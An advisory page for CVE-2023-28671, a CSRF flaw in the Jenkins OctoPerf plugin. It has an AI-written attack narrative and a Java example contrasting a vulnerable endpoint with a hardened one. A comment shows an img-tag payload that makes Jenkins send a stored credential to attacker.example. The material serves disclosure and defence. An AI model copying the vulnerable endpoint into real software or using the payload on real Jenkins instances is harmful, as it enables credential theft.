VYPR
Moderate severity · NVD Advisory · Published Mar 23, 2023 · Updated Feb 25, 2025

CVE-2023-28671

Description

A CSRF vulnerability in Jenkins OctoPerf Load Testing Plugin allows attackers to capture stored credentials by tricking users into connecting to an attacker-specified URL.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A cross-site request forgery (CSRF) vulnerability exists in the Jenkins OctoPerf Load Testing Plugin, versions 4.5.0 and earlier [1][2]. The affected HTTP endpoint opens a connection to a caller-supplied URL using a caller-supplied credentials ID, and it can be reached without the protection Jenkins normally applies: Jenkins' crumb-based CSRF defense is enforced only on POST requests, so an endpoint that also answers GET requests can be triggered by any cross-site link or image load the victim's browser follows while it still holds a Jenkins session cookie [1].

Exploitation needs two things. First, the attacker must already know a valid credentials ID, obtained through another method (for example a separate information-disclosure weakness that exposes credential IDs) [2]. Second, the attacker must get a Jenkins user who is logged in and holds whatever permission the endpoint expects to open an attacker-controlled page or click a crafted link [2]. The victim's browser then issues the request with the victim's session cookie; the plugin resolves the credentials ID to the stored secret and authenticates to the attacker-specified URL with it, so the attacker's server receives the secret in Jenkins' outbound request [1].

A successful attack discloses the stored credential to the attacker, who can then use it against every system the credential protects; for this plugin that is typically the OctoPerf account, but any credential of a type the plugin accepts whose ID the attacker can name is at risk [2]. The attacker needs no Jenkins account of their own, because the request is made by the victim's browser, which is why the attack depends on social engineering [1]. Practical response: upgrade to 4.5.1 or later, keep Jenkins' CSRF protection enabled, and treat any credential whose ID may have been exposed as compromised and rotate it.

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
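The mechanics above come down to a single Stapler web method on a Jenkins descriptor: a form-validation endpoint that takes its parameters from the query string and opens a connection with a stored credential. The following is an added example, not the OctoPerf plugin's code, showing that endpoint shape in a hypothetical GlobalConfiguration class; the package, class and method names, the endpoint URLs and the HTTP Basic login stand-in are assumptions. The vulnerable form comes first, then the hardened form that Jenkins plugin fixes for this class of bug generally apply (require POST so the crumb check can run, and check a permission before touching credentials).

```java
// Added example; hypothetical package and class, not the OctoPerf plugin's code.
package example.octoperfcsrf;

import com.cloudbees.plugins.credentials.CredentialsMatchers;
import com.cloudbees.plugins.credentials.CredentialsProvider;
import com.cloudbees.plugins.credentials.common.StandardUsernamePasswordCredentials;
import com.cloudbees.plugins.credentials.domains.URIRequirementBuilder;
import hudson.Extension;
import hudson.security.ACL;
import hudson.util.FormValidation;
import jenkins.model.GlobalConfiguration;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.interceptor.RequirePOST;

import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

@Extension
public class ConnectionTestConfig extends GlobalConfiguration {

    // Served (in this hypothetical layout) at
    //   /descriptorByName/example.octoperfcsrf.ConnectionTestConfig/checkConnectionVulnerable
    //
    // VULNERABLE shape. Without @RequirePOST Stapler serves the method for GET, and
    // Jenkins' crumb check applies only to POST. Without a permission check, any
    // logged-in session suffices. A page the victim visits can embed
    //   <img src="https://jenkins.example/descriptorByName/example.octoperfcsrf.ConnectionTestConfig
    //        /checkConnectionVulnerable?serverUrl=https://attacker.example&credentialsId=octoperf-prod">
    // The browser sends it with the Jenkins session cookie, and Jenkins then logs in
    // to attacker.example with the "octoperf-prod" credential.
    public FormValidation doCheckConnectionVulnerable(@QueryParameter String serverUrl,
                                                      @QueryParameter String credentialsId) {
        return attemptLogin(serverUrl, credentialsId);
    }

    // HARDENED shape. @RequirePOST makes Stapler reject GET (405) and lets the crumb
    // check cover the request; the explicit permission check stops lower-privileged
    // users from pointing stored credentials at arbitrary hosts. For job-scoped forms
    // the equivalent is checking Item.CONFIGURE on an @AncestorInPath Item instead.
    @RequirePOST
    public FormValidation doCheckConnection(@QueryParameter String serverUrl,
                                            @QueryParameter String credentialsId) {
        Jenkins.get().checkPermission(Jenkins.ADMINISTER);
        return attemptLogin(serverUrl, credentialsId);
    }

    // Stand-in for the plugin's real login call (assumption: HTTP Basic against
    // serverUrl). Whatever the real protocol, the secret leaves Jenkins toward
    // serverUrl, which is exactly what the attack relies on.
    private static FormValidation attemptLogin(String serverUrl, String credentialsId) {
        StandardUsernamePasswordCredentials c = CredentialsMatchers.firstOrNull(
                CredentialsProvider.lookupCredentials(
                        StandardUsernamePasswordCredentials.class, Jenkins.get(), ACL.SYSTEM,
                        URIRequirementBuilder.fromUri(serverUrl).build()),
                CredentialsMatchers.withId(credentialsId));
        if (c == null) {
            return FormValidation.error("No username/password credential with ID " + credentialsId);
        }
        String token = Base64.getEncoder().encodeToString(
                (c.getUsername() + ":" + c.getPassword().getPlainText())
                        .getBytes(StandardCharsets.UTF_8));
        try {
            HttpURLConnection conn = (HttpURLConnection) new URL(serverUrl).openConnection();
            conn.setRequestMethod("GET");
            conn.setRequestProperty("Authorization", "Basic " + token);
            conn.setConnectTimeout(5000);
            conn.setReadTimeout(5000);
            int status = conn.getResponseCode();
            return status == 200 ? FormValidation.ok("Connected")
                                 : FormValidation.error("Server answered HTTP " + status);
        } catch (IOException e) {
            return FormValidation.error(e, "Connection failed");
        }
    }
}
```

A quick way to tell the two shapes apart on a running instance is to request the form-validation URL with a plain GET while logged in as a non-administrator: the vulnerable shape performs the connection and returns a validation result, while the hardened shape answers 405 for GET and, for a POST carrying a valid crumb, refuses the non-administrator with an access-denied error before any credential is looked up.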

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                             Ecosystem   Affected versions   Patched versions
org.jenkinsci.plugins:octoperf      Maven       < 4.5.1             4.5.1

Affected products: 2

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: AI mechanics synthesis has not run for this CVE yet.

References: 3

News mentions: 1